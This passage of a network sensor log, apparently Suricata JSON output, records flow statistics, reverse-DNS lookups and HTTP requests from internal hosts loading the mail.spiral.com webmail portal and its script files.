{"timestamp":"2020-02-29T00:00:55.001755+0000","flow_id":1730797353766896,"event_type":"flow","src_ip":"192.168.10.81","src_port":52616,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1876,"bytes_toclient":5082,"start":"2020-02-28T23:59:47.987120+0000","end":"2020-02-28T23:59:53.055044+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:55.002779+0000","flow_id":2195066138595643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52620,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1877,"bytes_toclient":4848,"start":"2020-02-28T23:59:47.987451+0000","end":"2020-02-28T23:59:53.056574+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.003615+0000","flow_id":1364127405772621,"event_type":"flow","src_ip":"192.168.10.81","src_port":52614,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1881,"bytes_toclient":4146,"start":"2020-02-28T23:59:47.986957+0000","end":"2020-02-28T23:59:53.056615+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.004287+0000","flow_id":815591362597012,"event_type":"flow","src_ip":"192.168.10.81","src_port":52618,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":3690,"bytes_toclient":16828,"start":"2020-02-28T23:59:47.987284+0000","end":"2020-02-28T23:59:53.171824+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:56.000163+0000","event_type":"stats","stats":{"uptime":13708,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2218,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:56.001332+0000","flow_id":75620021953358,"event_type":"flow","src_ip":"192.168.10.122","src_port":58313,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.844622+0000","end":"2020-02-28T23:55:55.956115+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:56.001411+0000","flow_id":982596855727262,"event_type":"flow","src_ip":"192.168.10.122","src_port":44985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.591006+0000","end":"2020-02-28T23:55:55.699356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:57.000760+0000","flow_id":1865350074121926,"event_type":"flow","src_ip":"192.168.10.122","src_port":52535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:56.245446+0000","end":"2020-02-28T23:55:56.353917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:03.000383+0000","event_type":"stats","stats":{"uptime":13715,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2629,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:04.000551+0000","flow_id":1157019786067524,"event_type":"flow","src_ip":"192.168.10.130","src_port":34678,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2044,"bytes_toclient":16835,"start":"2020-02-28T23:59:20.376388+0000","end":"2020-02-29T00:00:03.894198+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:07.000910+0000","flow_id":1265931569107445,"event_type":"flow","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":15,"bytes_toserver":1762,"bytes_toclient":13104,"start":"2020-02-28T23:59:56.365045+0000","end":"2020-02-29T00:00:06.130670+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:08.000546+0000","flow_id":741056500184452,"event_type":"flow","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":49,"pkts_toclient":52,"bytes_toserver":11993,"bytes_toclient":43282,"start":"2020-02-28T23:59:47.963972+0000","end":"2020-02-29T00:00:07.960343+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:10.000189+0000","event_type":"stats","stats":{"uptime":13722,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2017,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:12.000518+0000","flow_id":922995595600655,"event_type":"flow","src_ip":"192.168.10.122","src_port":33317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-28T23:56:10.779023+0000","end":"2020-02-28T23:56:11.012016+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:13.484239+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17057,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:13.778567+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615}} 
{"timestamp":"2020-02-29T00:01:16.886820+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39617,"tx_id":0}} {"timestamp":"2020-02-29T00:01:16.894066+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61204,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:17.000126+0000","event_type":"stats","stats":{"uptime":13729,"capture":{"kernel_packets":131900,"kernel_drops":0},"decoder":{"pkts":131920,"bytes":91649600,"invalid":176,"ipv4":130501,"ipv6":8,"ethernet":131920,"raw":0,"null":0,"sll":0,"tcp":125551,"udp":4760,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2652,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2668,"synack":2659,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1700,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2169,"failed_udp":106},"tx":{"http":4382,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2245}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":71339,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:17.000725+0000","flow_id":715535805556464,"event_type":"flow","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1167,"bytes_toclient":9791,"start":"2020-02-29T00:00:03.894704+0000","end":"2020-02-29T00:00:16.593038+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:17.119588+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:01:17.163421+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} 
{"timestamp":"2020-02-29T00:01:17.165928+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:01:17.185752+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.193887+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:01:17.196121+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:01:17.200003+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.200688+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} 
{"timestamp":"2020-02-29T00:01:17.200986+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:01:17.190061+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:01:17.191717+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} 
{"timestamp":"2020-02-29T00:01:17.196294+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.202472+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.197485+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:01:17.202713+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:01:17.203688+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.204091+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
